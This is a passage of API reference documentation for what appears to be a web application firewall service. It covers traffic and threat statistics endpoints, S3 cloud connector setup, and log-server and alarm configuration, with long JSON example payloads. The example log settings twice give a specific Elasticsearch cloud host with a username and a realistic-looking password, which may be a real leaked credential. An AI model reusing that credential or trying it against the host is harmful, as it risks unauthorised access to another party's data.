- "data": [ ]
}, - {
- "id": 27,
- "time": 1660270200000,
- "data": [ ]
}, - {
- "id": 28,
- "time": 1660270800000,
- "data": [ ]
}, - {
- "id": 29,
- "time": 1660271400000,
- "data": [ ]
}, - {
- "id": 30,
- "time": 1660272000000,
- "data": [ ]
}, - {
- "id": 31,
- "time": 1660272600000,
- "data": [ ]
}, - {
- "id": 32,
- "time": 1660273200000,
- "data": [ ]
}, - {
- "id": 33,
- "time": 1660273800000,
- "data": [ ]
}, - {
- "id": 34,
- "time": 1660274400000,
- "data": [ ]
}, - {
- "id": 35,
- "time": 1660275000000,
- "data": [ ]
}, - {
- "id": 36,
- "time": 1660275600000,
- "data": [ ]
}, - {
- "id": 37,
- "time": 1660276200000,
- "data": [ ]
}, - {
- "id": 38,
- "time": 1660276800000,
- "data": [ ]
}, - {
- "id": 39,
- "time": 1660277400000,
- "data": [ ]
}, - {
- "id": 40,
- "time": 1660278000000,
- "data": [ ]
}, - {
- "id": 41,
- "time": 1660278600000,
- "data": [ ]
}, - {
- "id": 42,
- "time": 1660279200000,
- "data": [ ]
}, - {
- "id": 43,
- "time": 1660279800000,
- "data": [ ]
}, - {
- "id": 44,
- "time": 1660280400000,
- "data": [ ]
}, - {
- "id": 45,
- "time": 1660281000000,
- "data": [ ]
}, - {
- "id": 46,
- "time": 1660281600000,
- "data": [ ]
}, - {
- "id": 47,
- "time": 1660282200000,
- "data": [ ]
}, - {
- "id": 48,
- "time": 1660282800000,
- "data": [ ]
}, - {
- "id": 49,
- "time": 1660283400000,
- "data": [ ]
}, - {
- "id": 50,
- "time": 1660284000000,
- "data": [ ]
}, - {
- "id": 51,
- "time": 1660284600000,
- "data": [ ]
}, - {
- "id": 52,
- "time": 1660285200000,
- "data": [ ]
}, - {
- "id": 53,
- "time": 1660285800000,
- "data": [ ]
}, - {
- "id": 54,
- "time": 1660286400000,
- "data": [ ]
}, - {
- "id": 55,
- "time": 1660287000000,
- "data": [ ]
}, - {
- "id": 56,
- "time": 1660287600000,
- "data": [ ]
}, - {
- "id": 57,
- "time": 1660288200000,
- "data": [ ]
}, - {
- "id": 58,
- "time": 1660288800000,
- "data": [ ]
}, - {
- "id": 59,
- "time": 1660289400000,
- "data": [ ]
}, - {
- "id": 60,
- "time": 1660290000000,
- "data": [ ]
}, - {
- "id": 61,
- "time": 1660290600000,
- "data": [ ]
}, - {
- "id": 62,
- "time": 1660291200000,
- "data": [ ]
}, - {
- "id": 63,
- "time": 1660291800000,
- "data": [ ]
}, - {
- "id": 64,
- "time": 1660292400000,
- "data": [ ]
}, - {
- "id": 65,
- "time": 1660293000000,
- "data": [ ]
}, - {
- "id": 66,
- "time": 1660293600000,
- "data": [ ]
}, - {
- "id": 67,
- "time": 1660294200000,
- "data": [ ]
}, - {
- "id": 68,
- "time": 1660294800000,
- "data": [ ]
}, - {
- "id": 69,
- "time": 1660295400000,
- "data": [ ]
}, - {
- "id": 70,
- "time": 1660296000000,
- "data": [ ]
}, - {
- "id": 71,
- "time": 1660296600000,
- "data": [ ]
}, - {
- "id": 72,
- "time": 1660297200000,
- "data": [ ]
}, - {
- "id": 73,
- "time": 1660297800000,
- "data": [ ]
}, - {
- "id": 74,
- "time": 1660298400000,
- "data": [ ]
}, - {
- "id": 75,
- "time": 1660299000000,
- "data": [ ]
}, - {
- "id": 76,
- "time": 1660299600000,
- "data": [ ]
}, - {
- "id": 77,
- "time": 1660300200000,
- "data": [ ]
}, - {
- "id": 78,
- "time": 1660300800000,
- "data": [ ]
}, - {
- "id": 79,
- "time": 1660301400000,
- "data": [ ]
}, - {
- "id": 80,
- "time": 1660302000000,
- "data": [ ]
}, - {
- "id": 81,
- "time": 1660302600000,
- "data": [ ]
}, - {
- "id": 82,
- "time": 1660303200000,
- "data": [ ]
}, - {
- "id": 83,
- "time": 1660303800000,
- "data": [ ]
}, - {
- "id": 84,
- "time": 1660304400000,
- "data": [ ]
}, - {
- "id": 85,
- "time": 1660305000000,
- "data": [ ]
}, - {
- "id": 86,
- "time": 1660305600000,
- "data": [ ]
}, - {
- "id": 87,
- "time": 1660306200000,
- "data": [ ]
}, - {
- "id": 88,
- "time": 1660306800000,
- "data": [ ]
}, - {
- "id": 89,
- "time": 1660307400000,
- "data": [ ]
}, - {
- "id": 90,
- "time": 1660308000000,
- "data": [ ]
}, - {
- "id": 91,
- "time": 1660308600000,
- "data": [ ]
}, - {
- "id": 92,
- "time": 1660309200000,
- "data": [ ]
}, - {
- "id": 93,
- "time": 1660309800000,
- "data": [ ]
}, - {
- "id": 94,
- "time": 1660310400000,
- "data": [ ]
}, - {
- "id": 95,
- "time": 1660311000000,
- "data": [ ]
}, - {
- "id": 96,
- "time": 1660311600000,
- "data": [ ]
}, - {
- "id": 97,
- "time": 1660312200000,
- "data": [ ]
}, - {
- "id": 98,
- "time": 1660312800000,
- "data": [ ]
}, - {
- "id": 99,
- "time": 1660313400000,
- "data": [ ]
}, - {
- "id": 100,
- "time": 1660314000000,
- "data": [ ]
}, - {
- "id": 101,
- "time": 1660314600000,
- "data": [ ]
}, - {
- "id": 102,
- "time": 1660315200000,
- "data": [ ]
}, - {
- "id": 103,
- "time": 1660315800000,
- "data": [ ]
}, - {
- "id": 104,
- "time": 1660316400000,
- "data": [ ]
}, - {
- "id": 105,
- "time": 1660317000000,
- "data": [ ]
}, - {
- "id": 106,
- "time": 1660317600000,
- "data": [ ]
}, - {
- "id": 107,
- "time": 1660318200000,
- "data": [ ]
}, - {
- "id": 108,
- "time": 1660318800000,
- "data": [ ]
}, - {
- "id": 109,
- "time": 1660319400000,
- "data": [ ]
}, - {
- "id": 110,
- "time": 1660320000000,
- "data": [ ]
}, - {
- "id": 111,
- "time": 1660320600000,
- "data": [ ]
}, - {
- "id": 112,
- "time": 1660321200000,
- "data": [ ]
}, - {
- "id": 113,
- "time": 1660321800000,
- "data": [ ]
}, - {
- "id": 114,
- "time": 1660322400000,
- "data": [ ]
}, - {
- "id": 115,
- "time": 1660323000000,
- "data": [ ]
}, - {
- "id": 116,
- "time": 1660323600000,
- "data": [ ]
}, - {
- "id": 117,
- "time": 1660324200000,
- "data": [ ]
}, - {
- "id": 118,
- "time": 1660324800000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 1
}
}
]
}, - {
- "id": 119,
- "time": 1660325400000,
- "data": [ ]
}, - {
- "id": 120,
- "time": 1660326000000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 3
}
}
]
}, - {
- "id": 121,
- "time": 1660326600000,
- "data": [ ]
}, - {
- "id": 122,
- "time": 1660327200000,
- "data": [ ]
}, - {
- "id": 123,
- "time": 1660327800000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 4
}
}
]
}, - {
- "id": 124,
- "time": 1660328400000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 12
}
}
]
}, - {
- "id": 125,
- "time": 1660329000000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 13
}
}
]
}, - {
- "id": 126,
- "time": 1660329600000,
- "data": [ ]
}, - {
- "id": 127,
- "time": 1660330200000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 1
}
}
]
}, - {
- "id": 128,
- "time": 1660330800000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 11
}
}
]
}, - {
- "id": 129,
- "time": 1660331400000,
- "data": [ ]
}, - {
- "id": 130,
- "time": 1660332000000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 1
}
}
]
}, - {
- "id": 131,
- "time": 1660332600000,
- "data": [ ]
}, - {
- "id": 132,
- "time": 1660333200000,
- "data": [ ]
}, - {
- "id": 133,
- "time": 1660333800000,
- "data": [ ]
}, - {
- "id": 134,
- "time": 1660334400000,
- "data": [ ]
}, - {
- "id": 135,
- "time": 1660335000000,
- "data": [ ]
}, - {
- "id": 136,
- "time": 1660335600000,
- "data": [ ]
}, - {
- "id": 137,
- "time": 1660336200000,
- "data": [ ]
}, - {
- "id": 138,
- "time": 1660336800000,
- "data": [ ]
}, - {
- "id": 139,
- "time": 1660337400000,
- "data": [ ]
}, - {
- "id": 140,
- "time": 1660338000000,
- "data": [ ]
}, - {
- "id": 141,
- "time": 1660338600000,
- "data": [ ]
}, - {
- "id": 142,
- "time": 1660339200000,
- "data": [ ]
}, - {
- "id": 143,
- "time": 1660339800000,
- "data": [ ]
}, - {
- "id": 144,
- "time": 1660340400000,
- "data": [ ]
}, - {
- "id": 145,
- "time": 1660341000000,
- "data": [ ]
}
]
}
}/application/{ep_id}/traffic_summary/url_statistics?type=summary&start_time=1660254330143&end_time=1660340730143
/application/:ep_id/traffic_summary/traffic_summary/url_statistics?type=details&start_time=1660254450854&end_time=1660340850854&page=1&size=5&sort_by=total_number&filter=%7B%22http_url%22%3A%22%2F%22%7D
| ep_id required | string |
| start_time | string the start time of timespan |
| end_time | string the end time of timespan |
| type | string the type of query result only support "summary" and for "detail" |
| size | string the result table size |
| page | string the page number of requested information |
| filter | string For example, for the URL details table, the filter is "{?srccountry": ?canada, united state?, "http_url": ?/ip/*?}" |
{- "details": {
- "/image": {
- "count": 41
}, - "/": {
- "count": 7
}, - "/favicon.ico": {
- "count": 3
}, - "/contact": {
- "count": 1
}
}, - "summary": {
- "start": "1660254330143",
- "end": "1660340730143",
- "count": 145,
- "graph": [
- {
- "id": 1,
- "time": 1660254000000,
- "data": [ ]
}, - {
- "id": 2,
- "time": 1660254600000,
- "data": [ ]
}, - {
- "id": 3,
- "time": 1660255200000,
- "data": [ ]
}, - {
- "id": 4,
- "time": 1660255800000,
- "data": [ ]
}, - {
- "id": 5,
- "time": 1660256400000,
- "data": [ ]
}, - {
- "id": 6,
- "time": 1660257000000,
- "data": [ ]
}, - {
- "id": 7,
- "time": 1660257600000,
- "data": [ ]
}, - {
- "id": 8,
- "time": 1660258200000,
- "data": [ ]
}, - {
- "id": 9,
- "time": 1660258800000,
- "data": [
- {
- "source": "/",
- "value": {
- "count_sum": 1
}
}, - {
- "source": "/image",
- "value": {
- "count_sum": 1
}
}
]
}, - {
- "id": 10,
- "time": 1660259400000,
- "data": [
- {
- "source": "/favicon.ico",
- "value": {
- "count_sum": 1
}
}, - {
- "source": "/image",
- "value": {
- "count_sum": 3
}
}
]
}, - {
- "id": 11,
- "time": 1660260000000,
- "data": [ ]
}, - {
- "id": 12,
- "time": 1660260600000,
- "data": [ ]
}, - {
- "id": 13,
- "time": 1660261200000,
- "data": [ ]
}, - {
- "id": 14,
- "time": 1660261800000,
- "data": [ ]
}, - {
- "id": 15,
- "time": 1660262400000,
- "data": [ ]
}, - {
- "id": 16,
- "time": 1660263000000,
- "data": [ ]
}, - {
- "id": 17,
- "time": 1660263600000,
- "data": [ ]
}, - {
- "id": 18,
- "time": 1660264200000,
- "data": [ ]
}, - {
- "id": 19,
- "time": 1660264800000,
- "data": [ ]
}, - {
- "id": 20,
- "time": 1660265400000,
- "data": [ ]
}, - {
- "id": 21,
- "time": 1660266000000,
- "data": [ ]
}, - {
- "id": 22,
- "time": 1660266600000,
- "data": [ ]
}, - {
- "id": 23,
- "time": 1660267200000,
- "data": [ ]
}, - {
- "id": 24,
- "time": 1660267800000,
- "data": [ ]
}, - {
- "id": 25,
- "time": 1660268400000,
- "data": [ ]
}, - {
- "id": 26,
- "time": 1660269000000,
- "data": [ ]
}, - {
- "id": 27,
- "time": 1660269600000,
- "data": [ ]
}, - {
- "id": 28,
- "time": 1660270200000,
- "data": [ ]
}, - {
- "id": 29,
- "time": 1660270800000,
- "data": [ ]
}, - {
- "id": 30,
- "time": 1660271400000,
- "data": [ ]
}, - {
- "id": 31,
- "time": 1660272000000,
- "data": [ ]
}, - {
- "id": 32,
- "time": 1660272600000,
- "data": [ ]
}, - {
- "id": 33,
- "time": 1660273200000,
- "data": [ ]
}, - {
- "id": 34,
- "time": 1660273800000,
- "data": [ ]
}, - {
- "id": 35,
- "time": 1660274400000,
- "data": [ ]
}, - {
- "id": 36,
- "time": 1660275000000,
- "data": [ ]
}, - {
- "id": 37,
- "time": 1660275600000,
- "data": [ ]
}, - {
- "id": 38,
- "time": 1660276200000,
- "data": [ ]
}, - {
- "id": 39,
- "time": 1660276800000,
- "data": [ ]
}, - {
- "id": 40,
- "time": 1660277400000,
- "data": [ ]
}, - {
- "id": 41,
- "time": 1660278000000,
- "data": [ ]
}, - {
- "id": 42,
- "time": 1660278600000,
- "data": [ ]
}, - {
- "id": 43,
- "time": 1660279200000,
- "data": [ ]
}, - {
- "id": 44,
- "time": 1660279800000,
- "data": [ ]
}, - {
- "id": 45,
- "time": 1660280400000,
- "data": [ ]
}, - {
- "id": 46,
- "time": 1660281000000,
- "data": [ ]
}, - {
- "id": 47,
- "time": 1660281600000,
- "data": [ ]
}, - {
- "id": 48,
- "time": 1660282200000,
- "data": [ ]
}, - {
- "id": 49,
- "time": 1660282800000,
- "data": [ ]
}, - {
- "id": 50,
- "time": 1660283400000,
- "data": [ ]
}, - {
- "id": 51,
- "time": 1660284000000,
- "data": [ ]
}, - {
- "id": 52,
- "time": 1660284600000,
- "data": [ ]
}, - {
- "id": 53,
- "time": 1660285200000,
- "data": [ ]
}, - {
- "id": 54,
- "time": 1660285800000,
- "data": [ ]
}, - {
- "id": 55,
- "time": 1660286400000,
- "data": [ ]
}, - {
- "id": 56,
- "time": 1660287000000,
- "data": [ ]
}, - {
- "id": 57,
- "time": 1660287600000,
- "data": [ ]
}, - {
- "id": 58,
- "time": 1660288200000,
- "data": [ ]
}, - {
- "id": 59,
- "time": 1660288800000,
- "data": [ ]
}, - {
- "id": 60,
- "time": 1660289400000,
- "data": [ ]
}, - {
- "id": 61,
- "time": 1660290000000,
- "data": [ ]
}, - {
- "id": 62,
- "time": 1660290600000,
- "data": [ ]
}, - {
- "id": 63,
- "time": 1660291200000,
- "data": [ ]
}, - {
- "id": 64,
- "time": 1660291800000,
- "data": [ ]
}, - {
- "id": 65,
- "time": 1660292400000,
- "data": [ ]
}, - {
- "id": 66,
- "time": 1660293000000,
- "data": [ ]
}, - {
- "id": 67,
- "time": 1660293600000,
- "data": [ ]
}, - {
- "id": 68,
- "time": 1660294200000,
- "data": [ ]
}, - {
- "id": 69,
- "time": 1660294800000,
- "data": [ ]
}, - {
- "id": 70,
- "time": 1660295400000,
- "data": [ ]
}, - {
- "id": 71,
- "time": 1660296000000,
- "data": [ ]
}, - {
- "id": 72,
- "time": 1660296600000,
- "data": [ ]
}, - {
- "id": 73,
- "time": 1660297200000,
- "data": [ ]
}, - {
- "id": 74,
- "time": 1660297800000,
- "data": [ ]
}, - {
- "id": 75,
- "time": 1660298400000,
- "data": [ ]
}, - {
- "id": 76,
- "time": 1660299000000,
- "data": [ ]
}, - {
- "id": 77,
- "time": 1660299600000,
- "data": [ ]
}, - {
- "id": 78,
- "time": 1660300200000,
- "data": [ ]
}, - {
- "id": 79,
- "time": 1660300800000,
- "data": [ ]
}, - {
- "id": 80,
- "time": 1660301400000,
- "data": [ ]
}, - {
- "id": 81,
- "time": 1660302000000,
- "data": [ ]
}, - {
- "id": 82,
- "time": 1660302600000,
- "data": [ ]
}, - {
- "id": 83,
- "time": 1660303200000,
- "data": [ ]
}, - {
- "id": 84,
- "time": 1660303800000,
- "data": [ ]
}, - {
- "id": 85,
- "time": 1660304400000,
- "data": [ ]
}, - {
- "id": 86,
- "time": 1660305000000,
- "data": [ ]
}, - {
- "id": 87,
- "time": 1660305600000,
- "data": [ ]
}, - {
- "id": 88,
- "time": 1660306200000,
- "data": [ ]
}, - {
- "id": 89,
- "time": 1660306800000,
- "data": [ ]
}, - {
- "id": 90,
- "time": 1660307400000,
- "data": [ ]
}, - {
- "id": 91,
- "time": 1660308000000,
- "data": [ ]
}, - {
- "id": 92,
- "time": 1660308600000,
- "data": [ ]
}, - {
- "id": 93,
- "time": 1660309200000,
- "data": [ ]
}, - {
- "id": 94,
- "time": 1660309800000,
- "data": [ ]
}, - {
- "id": 95,
- "time": 1660310400000,
- "data": [ ]
}, - {
- "id": 96,
- "time": 1660311000000,
- "data": [ ]
}, - {
- "id": 97,
- "time": 1660311600000,
- "data": [ ]
}, - {
- "id": 98,
- "time": 1660312200000,
- "data": [ ]
}, - {
- "id": 99,
- "time": 1660312800000,
- "data": [ ]
}, - {
- "id": 100,
- "time": 1660313400000,
- "data": [ ]
}, - {
- "id": 101,
- "time": 1660314000000,
- "data": [ ]
}, - {
- "id": 102,
- "time": 1660314600000,
- "data": [ ]
}, - {
- "id": 103,
- "time": 1660315200000,
- "data": [ ]
}, - {
- "id": 104,
- "time": 1660315800000,
- "data": [ ]
}, - {
- "id": 105,
- "time": 1660316400000,
- "data": [ ]
}, - {
- "id": 106,
- "time": 1660317000000,
- "data": [ ]
}, - {
- "id": 107,
- "time": 1660317600000,
- "data": [ ]
}, - {
- "id": 108,
- "time": 1660318200000,
- "data": [ ]
}, - {
- "id": 109,
- "time": 1660318800000,
- "data": [ ]
}, - {
- "id": 110,
- "time": 1660319400000,
- "data": [ ]
}, - {
- "id": 111,
- "time": 1660320000000,
- "data": [ ]
}, - {
- "id": 112,
- "time": 1660320600000,
- "data": [ ]
}, - {
- "id": 113,
- "time": 1660321200000,
- "data": [ ]
}, - {
- "id": 114,
- "time": 1660321800000,
- "data": [ ]
}, - {
- "id": 115,
- "time": 1660322400000,
- "data": [ ]
}, - {
- "id": 116,
- "time": 1660323000000,
- "data": [ ]
}, - {
- "id": 117,
- "time": 1660323600000,
- "data": [ ]
}, - {
- "id": 118,
- "time": 1660324200000,
- "data": [ ]
}, - {
- "id": 119,
- "time": 1660324800000,
- "data": [
- {
- "source": "/",
- "value": {
- "count_sum": 1
}
}
]
}, - {
- "id": 120,
- "time": 1660325400000,
- "data": [ ]
}, - {
- "id": 121,
- "time": 1660326000000,
- "data": [
- {
- "source": "/image",
- "value": {
- "count_sum": 3
}
}
]
}, - {
- "id": 122,
- "time": 1660326600000,
- "data": [ ]
}, - {
- "id": 123,
- "time": 1660327200000,
- "data": [ ]
}, - {
- "id": 124,
- "time": 1660327800000,
- "data": [
- {
- "source": "/image",
- "value": {
- "count_sum": 4
}
}
]
}, - {
- "id": 125,
- "time": 1660328400000,
- "data": [
- {
- "source": "/image",
- "value": {
- "count_sum": 12
}
}
]
}, - {
- "id": 126,
- "time": 1660329000000,
- "data": [
- {
- "source": "/image",
- "value": {
- "count_sum": 12
}
}, - {
- "source": "/favicon.ico",
- "value": {
- "count_sum": 1
}
}
]
}, - {
- "id": 127,
- "time": 1660329600000,
- "data": [ ]
}, - {
- "id": 128,
- "time": 1660330200000,
- "data": [
- {
- "source": "/",
- "value": {
- "count_sum": 1
}
}
]
}, - {
- "id": 129,
- "time": 1660330800000,
- "data": [
- {
- "source": "/",
- "value": {
- "count_sum": 4
}
}, - {
- "source": "/image",
- "value": {
- "count_sum": 5
}
}, - {
- "source": "/contact",
- "value": {
- "count_sum": 1
}
}, - {
- "source": "/favicon.ico",
- "value": {
- "count_sum": 1
}
}
]
}, - {
- "id": 130,
- "time": 1660331400000,
- "data": [ ]
}, - {
- "id": 131,
- "time": 1660332000000,
- "data": [
- {
- "source": "/image",
- "value": {
- "count_sum": 1
}
}
]
}, - {
- "id": 132,
- "time": 1660332600000,
- "data": [ ]
}, - {
- "id": 133,
- "time": 1660333200000,
- "data": [ ]
}, - {
- "id": 134,
- "time": 1660333800000,
- "data": [ ]
}, - {
- "id": 135,
- "time": 1660334400000,
- "data": [ ]
}, - {
- "id": 136,
- "time": 1660335000000,
- "data": [ ]
}, - {
- "id": 137,
- "time": 1660335600000,
- "data": [ ]
}, - {
- "id": 138,
- "time": 1660336200000,
- "data": [ ]
}, - {
- "id": 139,
- "time": 1660336800000,
- "data": [ ]
}, - {
- "id": 140,
- "time": 1660337400000,
- "data": [ ]
}, - {
- "id": 141,
- "time": 1660338000000,
- "data": [ ]
}, - {
- "id": 142,
- "time": 1660338600000,
- "data": [ ]
}, - {
- "id": 143,
- "time": 1660339200000,
- "data": [ ]
}, - {
- "id": 144,
- "time": 1660339800000,
- "data": [ ]
}, - {
- "id": 145,
- "time": 1660340400000,
- "data": [ ]
}
]
}
}| ep_id required | string |
| server_type | string |
| user_bucket_name | string |
| user_access_id | string |
| user_secret_key | string |
| user_account_region | string |
{- "server_type": "S3",
- "user_bucket_name": "example-function",
- "user_access_id": "xxx",
- "user_secret_key": "xxx",
- "user_account_region": "us-west-2"
}{- "detail": "Connect the Cloud Connector successfully."
}Get endpoint log server configuration.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string The application ID, it can be obtained from List Applications API. |
{- "attackCfg": {
- "_status": "enable",
- "syslog-setting": {
- "elasticAlog": {
- "address": "f459405714614c5a8624bdc20f1180b1.ap-southeast-1.aws.found.io",
- "port": 9243,
- "username": "elastic",
- "password": "suFdYOFiU7FuFfBxoN2gHcuA",
- "syslog_type": "alog",
- "ep_id": "5610756959",
- "server_type": "elasticsearch"
}, - "syslog-server-name": {
- "severity": "Info",
- "address": "1.1.1.1",
- "port": 514,
- "cert_signed": 0,
- "cert": "cert content",
- "pkey": "key content",
- "pkey_passwd": "123456",
- "type": "attack",
- "ep_id": "9148333272",
- "protocol": "TCP",
- "server_type": "syslog",
- "syslog_type": "alog",
- "value": "cat=attack timestamp={{ts}} msg={{msg}}",
- "facility": "local0"
}, - "faz-server-name": {
- "address": "1.1.1.1",
- "port": 514,
- "type": "attack",
- "ep_id": "9148333272",
- "protocol": "TCP",
- "server_type": "faz",
- "syslog_type": "alog"
}
}
}, - "enableAlarm": true,
- "alarmMode": "advanced",
- "basicRule": {
- "customNotified": false,
- "name": "Basic Alarm",
- "threshold": "Critical",
- "defaultNotified": "user@example.com",
- "notified": null
}, - "advancedRules": [
- {
- "customNotified": true,
- "notified": "user2@example.com",
- "name": "demo_rule_3",
- "threshold": 800,
- "filters": [
- {
- "field": "main_type",
- "value": "Known Attacks",
- "operator": "is_not"
}
], - "enabled": true
}, - {
- "customNotified": false,
- "notified": null,
- "name": "demo_rule_2",
- "threshold": 200,
- "filters": [
- {
- "field": "src_ip",
- "startValue": "2.2.2.2",
- "endValue": "2.2.2.240",
- "operator": "is_between"
}
], - "enabled": true,
- "defaultNotified": "user@example.com"
}, - {
- "customNotified": false,
- "notified": null,
- "name": "demo_rule_1",
- "threshold": 1000,
- "filters": [
- {
- "field": "http_agent",
- "value": "chrome",
- "operator": "is"
}
], - "enabled": false,
- "defaultNotified": "user@example.com"
}
], - "logMaskRules": [
- {
- "rule_type": "URL",
- "name_pattern": "",
- "value_pattern": "password=.*"
}, - {
- "rule_type": "Parameter",
- "name_pattern": "password",
- "value_pattern": ".*"
}, - {
- "rule_type": "Cookie",
- "name_pattern": "password",
- "value_pattern": ".*"
}
], - "logstash_traffic_config": {
- "user_secret_key": "xxx",
- "user_bucket_name": "bucket-name-example",
- "user_access_id": "xxx",
- "user_prefix": "prefix-example",
- "_status": "enable",
- "user_account_region": "us-west-2",
- "server_type": "S3"
}
}A request body including all parameters and values is required.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string The application ID, it can be obtained from List Applications API. |
{- "attackCfg": {
- "_status": "enable",
- "syslog-setting": {
- "syslog-server-name": {
- "address": "1.1.1.1",
- "port": 514,
- "protocol": "TCP",
- "cert_signed": 0,
- "cert": "cert content",
- "verify_server_cert": 0,
- "pkey": "key content",
- "pkey_passwd": "123456",
- "type": "default",
- "value": "cat=attack date_time={{dt}} user_id={{uid}} ep_id={{eid}} app_name={{an}} ep_region={{er}} ep_domain={{ed}} src_ip={{si}} src_port={{sp}} backend_service={{bs}} dst_port={{dp}} srccountry={{sc}} service={{svc}} action={{act}} main_type={{mt}} sub_type={{st}} threat_level={{tl}} threat_weight={{tw}} http_host={{hh}} http_url={{hu}} http_version={{hv}} http_method={{hm}} http_agent={{ha}} http_refer={{hr}} length={{lt}} signature_id={{sid}} signature_cve_id={{sci}} owasp_top10={{ott}} msg={{msg}}",
- "facility": "local0",
- "severity": "Critical",
- "server_type": "syslog",
- "syslog_type": "alog"
}, - "elastic-server-name": {
- "server_type": "elasticsearch",
- "syslog_type": "alog",
- "address": "f459405714614c5a8624bdc20f1180b1.ap-southeast-1.aws.found.io",
- "port": 9243,
- "username": "elastic",
- "password": "suFdYOFiU7FuFfBxoN2gHcuA",
- "user_id": "bba91d22-ca28-11e9-b785-2e109146634c",
- "ep_id": "5610756959"
}, - "faz-server-name": {
- "address": "1.1.1.1",
- "port": 514,
- "protocol": "TCP",
- "verify_server_cert": 0,
- "server_type": "faz",
- "syslog_type": "alog",
- "facility": "local0",
- "severity": "alert"
}
}
}, - "enableAlarm": true,
- "alarmMode": "basic",
- "basicRule": {
- "customNotified": true,
- "name": "Basic Alarm",
- "threshold": "Critical",
- "notified": "user@demo.com"
}, - "advancedRules": [
- {
- "customNotified": true,
- "notified": "user2@example.com",
- "name": "demo_rule_3",
- "threshold": 800,
- "filters": [
- {
- "field": "main_type",
- "value": "Known Attacks",
- "operator": "is_not"
}
], - "enabled": true
}, - {
- "customNotified": false,
- "notified": null,
- "name": "demo_rule_2",
- "threshold": 200,
- "filters": [
- {
- "field": "src_ip",
- "startValue": "2.2.2.2",
- "endValue": "2.2.2.240",
- "operator": "is_not_between"
}
], - "enabled": true,
- "defaultNotified": "user@example.com"
}, - {
- "customNotified": false,
- "notified": null,
- "name": "demo_rule_1",
- "threshold": 1000,
- "filters": [
- {
- "field": "http_agent",
- "value": "chrome",
- "operator": "is"
}
], - "enabled": false,
- "defaultNotified": "user@example.com"
}
], - "logstash_traffic_config": {
- "user_secret_key": "xxxxx",
- "user_bucket_name": "user_bucket_name",
- "user_access_id": "xxx",
- "user_prefix": "user_prefix",
- "_status": "enable",
- "user_account_region": "us-west-2",
- "server_type": "S3"
}
}{- "detail": "Logs settings were changed successfully."
}Get the information of threats by geographic region.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string The application ID, it can be obtained from List Applications API. |
| start required | string The start time in millisecond format. |
| end required | string The end time in millisecond format. |
| count required | integer <= 2000 An integer, log numbers that will be retrieved in one request. The maximum value is 2000. |
{- "details": [ ],
- "total": 0,
- "next_msg_id": false,
- "next_start_time": false,
- "end_time": "1557729179000",
- "region": "us-east-1"
}Get the statistics information of threats. The result could be aggregated by srccountry or threat type.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string The application ID, it can be obtained from List Applications API. |
| report_by | string Example: report_by=main_type Log field name that is used to group the result in grid. Supported values include owasp_top10, main_type, src_ip and srccountry. |
| filter | string Example: filter=%7B%22http_url%22%3A%22test%22%2C%22main_type%22%3A%22Known%20Attacks%22%7D A string, it can be deserialized as JSON object. The value shall be URL encoded. For example, filter object is like: and the value for this param here shall be like: |
| end | string Example: end=1665446400000 The end time of time range in millisecond format. |
| start | string Example: start=1665360000000 The beginning time of time range in millisecond format. |
| count | string Example: count=20 An integer, the number of logs in one page and the maximum value is 100. |
| tend_by | string Example: tend_by=action Log field name which is used to group data in chart view. The values can be http_method, action, etc. |
| sort_by | string Example: sort_by=total_number The field name which is used to sort the result. It must be present in response, like total_number, score, etc. |
{- "details": [
- {
- "main_type": "Information Leakage",
- "total_number": 60,
- "total_score": 1800,
- "HTTPS": 60,
- "Block": 60,
- "HTTP": 0,
- "Monitor": 0,
- "threat_level": "High"
}, - {
- "main_type": "Known Attacks",
- "total_number": 1,
- "total_score": 30,
- "HTTPS": 1,
- "Block": 1,
- "HTTP": 0,
- "Monitor": 0,
- "threat_level": "High"
}
], - "summary": {
- "start": "1587453879971",
- "end": "1587457479971",
- "count": 5,
- "graph": [
- {
- "line_name": "Critical",
- "numbers": [
- {
- "id": 1,
- "time": 1587453840000,
- "line_number": 0
}, - {
- "id": 2,
- "time": 1587453900000,
- "line_number": 0
}, - {
- "id": 3,
- "time": 1587453960000,
- "line_number": 0
}, - {
- "id": 4,
- "time": 1587454020000,
- "line_number": 0
}, - {
- "id": 5,
- "time": 1587454080000,
- "line_number": 0
}, - {
- "id": 6,
- "time": 1587454140000,
- "line_number": 0
}, - {
- "id": 7,
- "time": 1587454200000,
- "line_number": 0
}, - {
- "id": 8,
- "time": 1587454260000,
- "line_number": 0
}, - {
- "id": 9,
- "time": 1587454320000,
- "line_number": 0
}, - {
- "id": 10,
- "time": 1587454380000,
- "line_number": 0
}, - {
- "id": 11,
- "time": 1587454440000,
- "line_number": 0
}, - {
- "id": 12,
- "time": 1587454500000,
- "line_number": 0
}, - {
- "id": 13,
- "time": 1587454560000,
- "line_number": 0
}, - {
- "id": 14,
- "time": 1587454620000,
- "line_number": 0
}, - {
- "id": 15,
- "time": 1587454680000,
- "line_number": 0
}, - {
- "id": 16,
- "time": 1587454740000,
- "line_number": 0
}, - {
- "id": 17,
- "time": 1587454800000,
- "line_number": 0
}, - {
- "id": 18,
- "time": 1587454860000,
- "line_number": 0
}, - {
- "id": 19,
- "time": 1587454920000,
- "line_number": 0
}, - {
- "id": 20,
- "time": 1587454980000,
- "line_number": 0
}, - {
- "id": 21,
- "time": 1587455040000,
- "line_number": 0
}, - {
- "id": 22,
- "time": 1587455100000,
- "line_number": 0
}, - {
- "id": 23,
- "time": 1587455160000,
- "line_number": 0
}, - {
- "id": 24,
- "time": 1587455220000,
- "line_number": 0
}, - {
- "id": 25,
- "time": 1587455280000,
- "line_number": 0
}, - {
- "id": 26,
- "time": 1587455340000,
- "line_number": 0
}, - {
- "id": 27,
- "time": 1587455400000,
- "line_number": 0
}, - {
- "id": 28,
- "time": 1587455460000,
- "line_number": 0
}, - {
- "id": 29,
- "time": 1587455520000,
- "line_number": 0
}, - {
- "id": 30,
- "time": 1587455580000,
- "line_number": 0
}, - {
- "id": 31,
- "time": 1587455640000,
